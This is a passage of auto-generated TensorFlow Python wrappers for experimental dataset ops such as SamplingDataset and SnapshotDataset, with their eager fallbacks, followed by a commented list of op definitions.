_inputs_flat = [input_dataset]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"ExperimentalUniqueDataset", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"ExperimentalUniqueDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def sampling_dataset(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None):
r"""Creates a dataset that contains `rate` elements from the `input_dataset`.
Args:
input_dataset: A `Tensor` of type `variant`.
rate: A `Tensor` of type `float32`.
A scalar representing the sample rate of elements from the `input_dataset`
that should be taken.
seed: A `Tensor` of type `int64`.
A scalar representing seed of random number generator.
seed2: A `Tensor` of type `int64`.
A scalar representing seed2 of random number generator.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"SamplingDataset", name, _ctx._post_execution_callbacks,
input_dataset, rate, seed, seed2, "output_types", output_types,
"output_shapes", output_shapes)
return _result
except _core._FallbackException:
try:
return sampling_dataset_eager_fallback(
input_dataset, rate, seed, seed2, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'sampling_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'sampling_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"SamplingDataset", input_dataset=input_dataset, rate=rate, seed=seed,
seed2=seed2, output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"SamplingDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def SamplingDataset(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None):
return sampling_dataset(input_dataset=input_dataset, rate=rate, seed=seed, seed2=seed2, output_types=output_types, output_shapes=output_shapes, name=name)
SamplingDataset.__doc__ = sampling_dataset.__doc__
SamplingDataset = _doc_controls.do_not_generate_docs(_kwarg_only(SamplingDataset))
tf_export("raw_ops.SamplingDataset")(SamplingDataset)
def sampling_dataset_eager_fallback(input_dataset, rate, seed, seed2, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function sampling_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'sampling_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'sampling_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
rate = _ops.convert_to_tensor(rate, _dtypes.float32)
seed = _ops.convert_to_tensor(seed, _dtypes.int64)
seed2 = _ops.convert_to_tensor(seed2, _dtypes.int64)
_inputs_flat = [input_dataset, rate, seed, seed2]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"SamplingDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"SamplingDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def snapshot_dataset(input_dataset, path, output_types, output_shapes, name=None):
r"""Creates a dataset that will write to / read from a snapshot.
This dataset attempts to determine whether a valid snapshot exists at the
`snapshot_path`, and reads from the snapshot in lieu of using `input_dataset`.
If not, it will run the preprocessing pipeline as usual, and write out a
snapshot of the data processed for future use.
Args:
input_dataset: A `Tensor` of type `variant`.
A variant tensor representing the input dataset.
path: A `Tensor` of type `string`.
The path we should write snapshots to / read snapshots from.
output_types: A list of `tf.DTypes` that has length `>= 1`.
output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `variant`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"SnapshotDataset", name, _ctx._post_execution_callbacks,
input_dataset, path, "output_types", output_types, "output_shapes",
output_shapes)
return _result
except _core._FallbackException:
try:
return snapshot_dataset_eager_fallback(
input_dataset, path, output_types=output_types,
output_shapes=output_shapes, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'snapshot_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'snapshot_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
_, _, _op = _op_def_lib._apply_op_helper(
"SnapshotDataset", input_dataset=input_dataset, path=path,
output_types=output_types,
output_shapes=output_shapes, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
_op.get_attr("output_shapes"))
_execute.record_gradient(
"SnapshotDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def SnapshotDataset(input_dataset, path, output_types, output_shapes, name=None):
return snapshot_dataset(input_dataset=input_dataset, path=path, output_types=output_types, output_shapes=output_shapes, name=name)
SnapshotDataset.__doc__ = snapshot_dataset.__doc__
SnapshotDataset = _doc_controls.do_not_generate_docs(_kwarg_only(SnapshotDataset))
tf_export("raw_ops.SnapshotDataset")(SnapshotDataset)
def snapshot_dataset_eager_fallback(input_dataset, path, output_types, output_shapes, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function snapshot_dataset
"""
_ctx = ctx if ctx else _context.context()
if not isinstance(output_types, (list, tuple)):
raise TypeError(
"Expected list for 'output_types' argument to "
"'snapshot_dataset' Op, not %r." % output_types)
output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
if not isinstance(output_shapes, (list, tuple)):
raise TypeError(
"Expected list for 'output_shapes' argument to "
"'snapshot_dataset' Op, not %r." % output_shapes)
output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
path = _ops.convert_to_tensor(path, _dtypes.string)
_inputs_flat = [input_dataset, path]
_attrs = ("output_types", output_types, "output_shapes", output_shapes)
_result = _execute.execute(b"SnapshotDataset", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"SnapshotDataset", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def stats_aggregator_handle_v2(container="", shared_name="", name=None):
r"""TODO: add doc.
Args:
container: An optional `string`. Defaults to `""`.
shared_name: An optional `string`. Defaults to `""`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `resource`.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"StatsAggregatorHandleV2", name, _ctx._post_execution_callbacks,
"container", container, "shared_name", shared_name)
return _result
except _core._FallbackException:
try:
return stats_aggregator_handle_v2_eager_fallback(
container=container, shared_name=shared_name, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_, _, _op = _op_def_lib._apply_op_helper(
"StatsAggregatorHandleV2", container=container,
shared_name=shared_name, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("container", _op.get_attr("container"), "shared_name",
_op.get_attr("shared_name"))
_execute.record_gradient(
"StatsAggregatorHandleV2", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def StatsAggregatorHandleV2(container="", shared_name="", name=None):
return stats_aggregator_handle_v2(container=container, shared_name=shared_name, name=name)
StatsAggregatorHandleV2.__doc__ = stats_aggregator_handle_v2.__doc__
StatsAggregatorHandleV2 = _doc_controls.do_not_generate_docs(_kwarg_only(StatsAggregatorHandleV2))
tf_export("raw_ops.StatsAggregatorHandleV2")(StatsAggregatorHandleV2)
def stats_aggregator_handle_v2_eager_fallback(container="", shared_name="", name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function stats_aggregator_handle_v2
"""
_ctx = ctx if ctx else _context.context()
if container is None:
container = ""
container = _execute.make_str(container, "container")
if shared_name is None:
shared_name = ""
shared_name = _execute.make_str(shared_name, "shared_name")
_inputs_flat = []
_attrs = ("container", container, "shared_name", shared_name)
_result = _execute.execute(b"StatsAggregatorHandleV2", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_execute.record_gradient(
"StatsAggregatorHandleV2", _inputs_flat, _attrs, _result, name)
_result, = _result
return _result
def stats_aggregator_set_summary_writer(stats_aggregator, summary, name=None):
r"""Set a summary_writer_interface to record statistics using given stats_aggregator.
Args:
stats_aggregator: A `Tensor` of type `resource`.
summary: A `Tensor` of type `resource`.
name: A name for the operation (optional).
Returns:
The created Operation.
"""
_ctx = _context._context or _context.context()
if _ctx is not None and _ctx._thread_local_data.is_eager:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._thread_local_data.device_name,
"StatsAggregatorSetSummaryWriter", name,
_ctx._post_execution_callbacks, stats_aggregator, summary)
return _result
except _core._FallbackException:
try:
return stats_aggregator_set_summary_writer_eager_fallback(
stats_aggregator, summary, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
# Add nodes to the TensorFlow graph.
_, _, _op = _op_def_lib._apply_op_helper(
"StatsAggregatorSetSummaryWriter", stats_aggregator=stats_aggregator,
summary=summary, name=name)
return _op
_result = None
return _result
def StatsAggregatorSetSummaryWriter(stats_aggregator, summary, name=None):
return stats_aggregator_set_summary_writer(stats_aggregator=stats_aggregator, summary=summary, name=name)
StatsAggregatorSetSummaryWriter.__doc__ = stats_aggregator_set_summary_writer.__doc__
StatsAggregatorSetSummaryWriter = _doc_controls.do_not_generate_docs(_kwarg_only(StatsAggregatorSetSummaryWriter))
tf_export("raw_ops.StatsAggregatorSetSummaryWriter")(StatsAggregatorSetSummaryWriter)
def stats_aggregator_set_summary_writer_eager_fallback(stats_aggregator, summary, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function stats_aggregator_set_summary_writer
"""
_ctx = ctx if ctx else _context.context()
stats_aggregator = _ops.convert_to_tensor(stats_aggregator, _dtypes.resource)
summary = _ops.convert_to_tensor(summary, _dtypes.resource)
_inputs_flat = [stats_aggregator, summary]
_attrs = None
_result = _execute.execute(b"StatsAggregatorSetSummaryWriter", 0,
inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
name=name)
_result = None
return _result
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "ChooseFastestBranchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "ratio_numerator"
# type: DT_INT64
# }
# input_arg {
# name: "ratio_denominator"
# type: DT_INT64
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "num_elements_per_branch"
# type: "int"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "branches"
# type: "list(func)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "other_arguments_lengths"
# type: "list(int)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalAssertNextDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "transformations"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalAutoShardDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_workers"
# type: DT_INT64
# }
# input_arg {
# name: "index"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalBytesProducedStatsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalCSVDataset"
# input_arg {
# name: "filenames"
# type: DT_STRING
# }
# input_arg {
# name: "compression_type"
# type: DT_STRING
# }
# input_arg {
# name: "buffer_size"
# type: DT_INT64
# }
# input_arg {
# name: "header"
# type: DT_BOOL
# }
# input_arg {
# name: "field_delim"
# type: DT_STRING
# }
# input_arg {
# name: "use_quote_delim"
# type: DT_BOOL
# }
# input_arg {
# name: "na_value"
# type: DT_STRING
# }
# input_arg {
# name: "select_cols"
# type: DT_INT64
# }
# input_arg {
# name: "record_defaults"
# type_list_attr: "output_types"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_DOUBLE
# type: DT_INT32
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalChooseFastestDataset"
# input_arg {
# name: "input_datasets"
# type: DT_VARIANT
# number_attr: "N"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "N"
# type: "int"
# has_minimum: true
# minimum: 2
# }
# attr {
# name: "num_experiments"
# type: "int"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalDatasetCardinality"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "cardinality"
# type: DT_INT64
# }
# }
# op {
# name: "ExperimentalDatasetToTFRecord"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "filename"
# type: DT_STRING
# }
# input_arg {
# name: "compression_type"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalDenseToSparseBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "row_shape"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalDirectedInterleaveDataset"
# input_arg {
# name: "selector_input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "data_input_datasets"
# type: DT_VARIANT
# number_attr: "N"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "N"
# type: "int"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalGroupByReducerDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "key_func_other_arguments"
# type_list_attr: "Tkey_func_other_arguments"
# }
# input_arg {
# name: "init_func_other_arguments"
# type_list_attr: "Tinit_func_other_arguments"
# }
# input_arg {
# name: "reduce_func_other_arguments"
# type_list_attr: "Treduce_func_other_arguments"
# }
# input_arg {
# name: "finalize_func_other_arguments"
# type_list_attr: "Tfinalize_func_other_arguments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "key_func"
# type: "func"
# }
# attr {
# name: "init_func"
# type: "func"
# }
# attr {
# name: "reduce_func"
# type: "func"
# }
# attr {
# name: "finalize_func"
# type: "func"
# }
# attr {
# name: "Tkey_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tinit_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Treduce_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Tfinalize_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalGroupByWindowDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "key_func_other_arguments"
# type_list_attr: "Tkey_func_other_arguments"
# }
# input_arg {
# name: "reduce_func_other_arguments"
# type_list_attr: "Treduce_func_other_arguments"
# }
# input_arg {
# name: "window_size_func_other_arguments"
# type_list_attr: "Twindow_size_func_other_arguments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "key_func"
# type: "func"
# }
# attr {
# name: "reduce_func"
# type: "func"
# }
# attr {
# name: "window_size_func"
# type: "func"
# }
# attr {
# name: "Tkey_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Treduce_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "Twindow_size_func_other_arguments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalIdentityIndexedDataset"
# input_arg {
# name: "size"
# type: DT_UINT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIgnoreErrorsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalIndexedDatasetGet"
# input_arg {
# name: "materialized"
# type: DT_RESOURCE
# }
# input_arg {
# name: "index"
# type: DT_UINT64
# }
# output_arg {
# name: "components"
# type_list_attr: "output_types"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIndexedDatasetMaterialize"
# input_arg {
# name: "dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "materialized"
# type: DT_RESOURCE
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalIteratorGetDevice"
# input_arg {
# name: "resource"
# type: DT_RESOURCE
# }
# output_arg {
# name: "device"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalLMDBDataset"
# input_arg {
# name: "filenames"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalLatencyStatsDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalMapAndBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "drop_remainder"
# type: DT_BOOL
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalMapDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "use_inter_op_parallelism"
# type: "bool"
# default_value {
# b: true
# }
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalMatchingFilesDataset"
# input_arg {
# name: "patterns"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalMaterializedIndexDatasetHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# }
# attr {
# name: "shared_name"
# type: "string"
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalMaxIntraOpParallelismDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "max_intra_op_parallelism"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalNonSerializableDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalNumaMapAndBatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "batch_size"
# type: DT_INT64
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "drop_remainder"
# type: DT_BOOL
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalParallelInterleaveDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# input_arg {
# name: "cycle_length"
# type: DT_INT64
# }
# input_arg {
# name: "block_length"
# type: DT_INT64
# }
# input_arg {
# name: "sloppy"
# type: DT_BOOL
# }
# input_arg {
# name: "buffer_output_elements"
# type: DT_INT64
# }
# input_arg {
# name: "prefetch_input_elements"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalParseExampleDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_parallel_calls"
# type: DT_INT64
# }
# input_arg {
# name: "dense_defaults"
# type_list_attr: "Tdense"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "sparse_keys"
# type: "list(string)"
# has_minimum: true
# }
# attr {
# name: "dense_keys"
# type: "list(string)"
# has_minimum: true
# }
# attr {
# name: "sparse_types"
# type: "list(type)"
# has_minimum: true
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "Tdense"
# type: "list(type)"
# has_minimum: true
# allowed_values {
# list {
# type: DT_FLOAT
# type: DT_INT64
# type: DT_STRING
# }
# }
# }
# attr {
# name: "dense_shapes"
# type: "list(shape)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "sloppy"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalPrivateThreadPoolDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_threads"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalRandomDataset"
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "seed2"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalRebatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "num_workers"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalScanDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "initial_state"
# type_list_attr: "Tstate"
# }
